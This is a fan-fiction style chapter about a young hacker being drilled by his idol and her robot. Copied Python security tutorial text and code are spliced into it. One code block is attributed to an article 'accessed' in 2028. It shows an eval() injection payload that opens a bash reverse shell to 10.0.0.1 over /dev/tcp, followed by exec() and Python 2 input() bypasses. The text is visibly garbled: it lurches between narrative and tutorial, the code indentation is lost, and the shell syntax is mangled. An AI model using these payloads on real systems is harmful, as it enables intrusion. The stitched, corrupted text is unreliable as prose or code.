Chapter 69: Cyrus Meets His Idol
[POV Cyrus]
"OMG!!!"
"You have a fully functional AI robot!" I am amazed by the piece of art standing in front of me.
"Hi, my name is 'Jiffy'. Stop calling me an Artificial Intelligence piece of metal," the Robo introduced itself.
I am mesmerised.
"So Cool! Pardon me Mrs Hu but this is a dream come true."
(Imagine yourself standing in front of R2-D2 from the Star Wars movie. Only thing is, I am in front of a far more advanced and almost humanoid version of it. The punch it packs!!)
"Hi Jiffy," I extend my hands as a greeting. It took my hands.
'Oh, the thrill.'
"Stop goofing around Cyrus, I have a lot to do," Mrs Hu reprimanded me.
"Yes ma'am"
"Please call me Bai Chang."
"Yes, ma'am Bai Chang," I replied awkwardly.
"Cut out ma'am and just call me Bai Chang. Don't worry, your boss won't default you for that," she replied while a small smile enhanced the charm of her beauty.
"Are you all set?" she asked.
"Yes ma'am, I mean Bai Chang."
My tongue twisted as I tried to stop myself from messing up this opportunity.
'In Front of me stands second most sought out hacker in the world, The Black Orion.'
I look towards 'Jiffy'.
'Scratch that, she is already a next-generation coder according to me. The best example being the latest cyber-security code designed by her.'
"Let's get started then," Mrs Hu said.
I simply nodded.
(I'm gonna learn from the best coder in the world!)
"First thing first. Are you aware of the contest rules?"
"Yes ma'- pardon me, Bai Chang."
"Good, reiterate them to me."
"Yes, they are going to conduct the event in two stages. The first stage, the participating companies need to crack the government cyber-security firewall. The second stage, Government hackers and coders would try to break participating companies security codes."
"Hmmm… Interesting. How do you suggest we win?"
"Well, that's easy by cracking the codes."
She sighed at my reply.
'Did I say something wrong? My forehead furrowed up.'
"Don't get me wrong here but this is a contest, so…"
"So…" I said.
"So, we need to win this contest in style with a high impact on the spectators."
I tense up. "How do we do that?" After some contemplation, I asked her.
She simply smiled at me.
"Okay, let us start with the First stage," she turned to 'Jiffy', "start from our zero intensity then level it up a notch depending on his results."
"Okay, initiating mock setups."
"Cyrus," she turned towards me and said, "first start decoding the firewalls 'Jiffy' setups for you. I will correct you in the process."
Without further ado, a virtual system is set and 'Jiffy' takes the control seat. I need to crack that firewall and hack the system
It was a scene straight out of a Sci-Fi movie. There is blue techno light reflecting throughout the study as the virtual holographic screen floats in the middle of the study.
('So F**king Cool!!')
The first one is easy, I start to type the assert code.
Since the beginning of the digital age, information has become one of the most valuable resources in the world. Personal information, bank data, logins and passwords - all of this, on one hand, makes life a lot easier in many aspects, and on the other, can be used by attackers to commit actions which will have negative consequences for the owner of this information.
Of course, to get hold of this information, you first need to find the vulnerabilities in the software that will allow you to steal important information by interfering with the correct execution of the program.
It's not necessary to use assert to protect those code fragments that users shouldn't have access to.
Like-
def secure(request, user):
assert user.is_admin, "user does not have access"
# protected code…
By default, __debug__ is set to True. However, optimizations are often made on the production server, including setting the False value for __debug__. As a result, the assert commands won't work and it'll allow hackers to get to the protected code regardless of the user's authority.
Mostly the assert command only to tell other developers about the invariants in the code.
I crack the first firewall.
'That was easy.' I thought to myself.
Next, another set of codes started to run. The program was a level higher in its difficulty to understand and attack.
In most such cases it is the Time of Attack that matters to unravel the programming codes.
Timing Attack - is a method of finding out the running principles of an algorithm, by measuring the time required to process different values. Timing attacks are ineffective when working in a remote network with high latency, as they require accuracy. Because of the changeable latency that exists in many web applications, it's almost impossible to perform a timing attack on servers running HTTP.
But if your application requests a password, for example, via the command line, then it's vulnerable to this kind of attack.
A hacker can write a simple script to estimate the time needed to compare the entered and stored secret information. This helps them to plan their respective code script.
You will get various examples from GitHub. In such cases use the compare_digest module introduced in Python 3.5 to check passwords and other private values.
It is an old version of Python but it works like a charm.
I cracked the second firewall. Without any time delay, 'Jiffy' puts another firewall in action.
I look towards Mrs Hu. But she seems to be working on something else.
'I guess with these successive firewalls she is trying to evaluate my skills. And till now there is no wow moment from me.'
'Sigh… Geniuses are all together at whole another level.'
Today in person I witnessed the gap between me and The Black Orion, my idol. And now my mentor.
'I guess that is something to be happy about. That she is my mentor now.'
"Focus on what you are doing at present. You just messed up the firewall coding script of your and delayed the decoding process by 7.236 seconds. In our field, each second has an equivalent value to gold bars in real life. Get a grip over yourself. Don't let your emotions drive your hardware," Mrs Hu spoke without even looking up from her screen.
I gulped nervously.
'She was keeping an eye out on me all this time and I made a rookie mistake in front of her.'
'Oh… no-no, no. This is so not happening to me.
I immediately start typing away my input script.
# Source: https://medium.com/swlh/hacking-python-applications-5d4cd541b3f1
# Accessed: 2028-03-21
# --------------------------------------------------
# Exploit of eval()
def addition(a, b):
return eval("%s + %s" % (a, b))
# Such an input might be a JSON response to a network request
userinput = {
"a": "__import__('os').system('bash -i ]& /dev/tcp/10.0.0.1/8080 0]&1')#",
"b": "2"
}
result = addition(userinput['a'], userinput['b'])
print("The result is %d." % result)
# --------------------------------------------------
# Exploit of exec()
# Can be exploited in the same way as eval()
def addition(a, b):
return exec("%s + %s" % (a, b))
# --------------------------------------------------
# Bypass authentication in Python2's input()
# Python3's input() will convert input to a string and is therefore safer
user_pass = get_user_pass("admin")
if user_pass == input("Please enter your password"):
login()
else:
print "Password is incorrect!"
# Bypass authentication if user enters 'user_pass'
# if user_pass == user_pass: // this will evaluate as true
As I started to crack more firewalls the level of difficulty increased significantly. There were Cluttered site-packages directory and yaml.load as well as there was data deserialization which is as dangerous as yaml.load.
The whole firewall cracking process felt like one giant test devised to evaluate a programmer.
'It is so Sick!'
After four hours of non-stop programming, 'Jiffy' called it a stop.
"Not bad but not up to the mark either," Mrs Hu spoke up.
(My heart broke, what kind of level is she at?)
"You took four hours thirty-five minutes and ten-point four-five seconds. This was just level zero to three on our spectrum.
To convince others that you designed the cyber-security code, you need to do way better than just now."
I hang my head in shame.
(I let down my idol, my mentor… Oh no!)
"You are okay with identifying the problem and the weak spots in a firewall but your approach to tackle is too obsolete."
I am stunned to silence. (That was the latest method and tools I used to crack them open. One of them was released just last week.)
"You need more finesse. After dinner has another marathon with 'Jiffy'," she said.
"Yes ma'am"
"Don't get dejected. It was good but not the best when compared to the code you are going to present. This drilling is required to keep you safe. So that people think that you are the genuine programmer of the security code," she smiled.
"How did you come up with such code? If you do not mind me asking you?" I couldn't help but ask.
"I guess I had too much to say and do after spending three years in deep sleep…"